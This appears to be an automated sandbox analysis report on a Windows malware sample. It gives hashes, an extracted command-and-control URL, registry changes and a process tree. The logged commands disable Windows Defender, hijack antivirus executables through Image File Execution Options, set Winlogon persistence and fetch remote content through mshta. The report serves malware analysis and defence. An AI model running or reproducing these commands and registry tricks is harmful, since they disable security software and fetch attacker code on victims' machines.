Analysis
-
max time kernel
1s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
11/01/2024, 20:29
Static task
static1
Behavioral task
behavioral1
Sample
538c7bed1041f2dc8ed93af435922499.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
538c7bed1041f2dc8ed93af435922499.exe
Resource
win10v2004-20231222-en
General
-
Target
538c7bed1041f2dc8ed93af435922499.exe
-
Size
1.7MB
-
MD5
538c7bed1041f2dc8ed93af435922499
-
SHA1
f837eb2943098893d02fc07562a1992bccdf3870
-
SHA256
01ec3e0a5dd5eba50af5c5c0afaacc802c19393982a601e917dff22d90b05880
-
SHA512
3d32e49967c25103b1620158cf93bb12360b64b04cd6a47aad5c5bb07792fa93587cfaabdae490286b10d03358630667b4cd215f185e502497b9a6c7abee18a5
-
SSDEEP
24576:VxZY9QHZy/U6znFxSnMf0eXloYfUXr8Wfq7E4FC15LyAhnxCsgj5pzvXtMLJ+:1WUAXEyV8ok4I15GABY/tp9
Malware Config
Extracted
http://pcguarrantor-utility.com/favicon.ico?0=67&1=0&2=2&3=66&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\vtjceg.exe" vtjceg.exe -
Sets file execution options in registry 2 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe vtjceg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" vtjceg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe vtjceg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe vtjceg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" vtjceg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe vtjceg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" vtjceg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe vtjceg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe vtjceg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" vtjceg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" vtjceg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" vtjceg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe vtjceg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" vtjceg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" vtjceg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe vtjceg.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 1912 vtjceg.exe -
Loads dropped DLL 2 IoCs
pid Process 2168 538c7bed1041f2dc8ed93af435922499.exe 2168 538c7bed1041f2dc8ed93af435922499.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2756 sc.exe 2796 sc.exe 2764 sc.exe 2572 sc.exe 1224 sc.exe 2900 sc.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1912 vtjceg.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1912 vtjceg.exe Token: SeShutdownPrivilege 1912 vtjceg.exe Token: SeDebugPrivilege 1912 vtjceg.exe Token: SeShutdownPrivilege 1912 vtjceg.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1912 vtjceg.exe 1912 vtjceg.exe 1912 vtjceg.exe 1912 vtjceg.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2168 wrote to memory of 2572 2168 538c7bed1041f2dc8ed93af435922499.exe 16 PID 2168 wrote to memory of 2572 2168 538c7bed1041f2dc8ed93af435922499.exe 16 PID 2168 wrote to memory of 2572 2168 538c7bed1041f2dc8ed93af435922499.exe 16 PID 2168 wrote to memory of 2572 2168 538c7bed1041f2dc8ed93af435922499.exe 16 PID 2168 wrote to memory of 2764 2168 538c7bed1041f2dc8ed93af435922499.exe 37 PID 2168 wrote to memory of 2764 2168 538c7bed1041f2dc8ed93af435922499.exe 37 PID 2168 wrote to memory of 2764 2168 538c7bed1041f2dc8ed93af435922499.exe 37 PID 2168 wrote to memory of 2764 2168 538c7bed1041f2dc8ed93af435922499.exe 37 PID 2168 wrote to memory of 2600 2168 538c7bed1041f2dc8ed93af435922499.exe 34 PID 2168 wrote to memory of 2600 2168 538c7bed1041f2dc8ed93af435922499.exe 34 PID 2168 wrote to memory of 2600 2168 538c7bed1041f2dc8ed93af435922499.exe 34 PID 2168 wrote to memory of 2600 2168 538c7bed1041f2dc8ed93af435922499.exe 34 PID 2168 wrote to memory of 2796 2168 538c7bed1041f2dc8ed93af435922499.exe 33 PID 2168 wrote to memory of 2796 2168 538c7bed1041f2dc8ed93af435922499.exe 33 PID 2168 wrote to memory of 2796 2168 538c7bed1041f2dc8ed93af435922499.exe 33 PID 2168 wrote to memory of 2796 2168 538c7bed1041f2dc8ed93af435922499.exe 33 PID 2168 wrote to memory of 1912 2168 538c7bed1041f2dc8ed93af435922499.exe 17 PID 2168 wrote to memory of 1912 2168 538c7bed1041f2dc8ed93af435922499.exe 17 PID 2168 wrote to memory of 1912 2168 538c7bed1041f2dc8ed93af435922499.exe 17 PID 2168 wrote to memory of 1912 2168 538c7bed1041f2dc8ed93af435922499.exe 17 PID 2168 wrote to memory of 1360 2168 538c7bed1041f2dc8ed93af435922499.exe 30 PID 2168 wrote to memory of 1360 2168 538c7bed1041f2dc8ed93af435922499.exe 30 PID 2168 wrote to memory of 1360 2168 538c7bed1041f2dc8ed93af435922499.exe 30 PID 2168 wrote to memory of 1360 2168 538c7bed1041f2dc8ed93af435922499.exe 30 PID 2600 wrote to memory of 2780 2600 net.exe 28 PID 2600 wrote to memory of 2780 2600 net.exe 28 PID 2600 wrote to memory of 2780 2600 net.exe 28 PID 2600 wrote to memory of 2780 2600 net.exe 28 PID 1912 wrote to memory of 2756 1912 vtjceg.exe 27 PID 1912 wrote to memory of 2756 1912 vtjceg.exe 27 PID 1912 wrote to memory of 2756 1912 vtjceg.exe 27 PID 1912 wrote to memory of 2756 1912 vtjceg.exe 27 PID 1912 wrote to memory of 2900 1912 vtjceg.exe 26 PID 1912 wrote to memory of 2900 1912 vtjceg.exe 26 PID 1912 wrote to memory of 2900 1912 vtjceg.exe 26 PID 1912 wrote to memory of 2900 1912 vtjceg.exe 26 PID 1912 wrote to memory of 2436 1912 vtjceg.exe 25 PID 1912 wrote to memory of 2436 1912 vtjceg.exe 25 PID 1912 wrote to memory of 2436 1912 vtjceg.exe 25 PID 1912 wrote to memory of 2436 1912 vtjceg.exe 25 PID 1912 wrote to memory of 1224 1912 vtjceg.exe 18 PID 1912 wrote to memory of 1224 1912 vtjceg.exe 18 PID 1912 wrote to memory of 1224 1912 vtjceg.exe 18 PID 1912 wrote to memory of 1224 1912 vtjceg.exe 18 PID 1912 wrote to memory of 1708 1912 vtjceg.exe 21 PID 1912 wrote to memory of 1708 1912 vtjceg.exe 21 PID 1912 wrote to memory of 1708 1912 vtjceg.exe 21 PID 1912 wrote to memory of 1708 1912 vtjceg.exe 21
Processes
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend1⤵
- Launches sc.exe
PID:2572
-
C:\Users\Admin\AppData\Roaming\Microsoft\vtjceg.exeC:\Users\Admin\AppData\Roaming\Microsoft\vtjceg.exe1⤵
- Modifies WinLogon for persistence
- Sets file execution options in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
PID:1224
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://pcguarrantor-utility.com/favicon.ico?0=67&1=0&2=2&3=66&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000"2⤵PID:1708
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵PID:2436
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:2900
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:2756
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc1⤵PID:2020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc1⤵PID:2780
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\538C7B~1.EXE" >> NUL1⤵PID:1360
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled1⤵
- Launches sc.exe
PID:2796
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc1⤵
- Suspicious use of WriteProcessMemory
PID:2600
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled1⤵
- Launches sc.exe
PID:2764
-
C:\Users\Admin\AppData\Local\Temp\538c7bed1041f2dc8ed93af435922499.exe"C:\Users\Admin\AppData\Local\Temp\538c7bed1041f2dc8ed93af435922499.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2168
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1